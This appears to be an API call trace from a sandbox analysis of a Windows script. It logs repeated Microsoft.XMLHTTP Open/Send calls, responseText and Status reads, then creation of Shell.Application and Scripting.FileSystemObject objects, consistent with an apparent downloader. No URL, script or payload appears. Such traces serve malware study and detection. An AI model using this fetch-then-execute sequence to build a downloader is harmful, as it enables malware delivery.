	[0635.559] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0635.559] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0635.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0635.560] ??2@YAPEAX_K@Z () returned 0x62f330
	[0635.560] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0635.560] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0635.560] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0635.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0635.560] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0635.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0635.560] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0635.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0635.560] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0635.560] SysStringLen (param_1=0x0) returned 0x0
	[0635.560] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0635.560] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0635.561] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0635.561] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0635.561] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0635.561] ??2@YAPEAX_K@Z () returned 0x62f310
	[0635.561] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0635.561] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0635.561] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0635.561] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0635.561] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0635.561] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0635.561] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0635.561] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0635.561] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0635.561] SysStringLen (param_1=0x0) returned 0x0
	[0635.561] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0635.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0635.562] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0635.562] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0635.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0635.562] ??2@YAPEAX_K@Z () returned 0x62f330
	[0635.562] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0635.562] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0635.562] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0635.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0635.562] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0635.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0635.562] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0635.562] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0635.562] longjmp () 
	[0635.563] longjmp () 
	[0635.563] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0635.563] SysStringLen (param_1=0x0) returned 0x0
	[0635.563] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0635.563] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0635.563] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0635.563] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0635.563] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0635.563] ??2@YAPEAX_K@Z () returned 0x62f310
	[0635.563] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0635.564] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0635.564] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0635.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0635.564] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0635.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0635.564] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0635.564] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0635.564] longjmp () 
	[0635.564] longjmp () 
	[0635.564] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0635.564] SysStringLen (param_1=0x0) returned 0x0
	[0635.564] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0635.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0635.565] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0635.565] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0635.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0635.565] ??2@YAPEAX_K@Z () returned 0x62f330
	[0635.565] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0635.565] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0635.565] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0635.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0635.565] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0635.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0635.565] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0635.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0635.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0635.566] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0635.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0640.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0640.432] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0640.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0640.432] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0640.432] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0640.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0640.433] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0640.433] SysStringLen (param_1=0x0) returned 0x0
	[0640.433] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0640.433] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0640.433] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0640.434] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0640.434] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0640.434] ??2@YAPEAX_K@Z () returned 0x62f350
	[0640.434] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0640.434] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0640.434] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0640.434] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0640.434] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0640.434] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0640.434] SysStringLen (param_1=0x0) returned 0x0
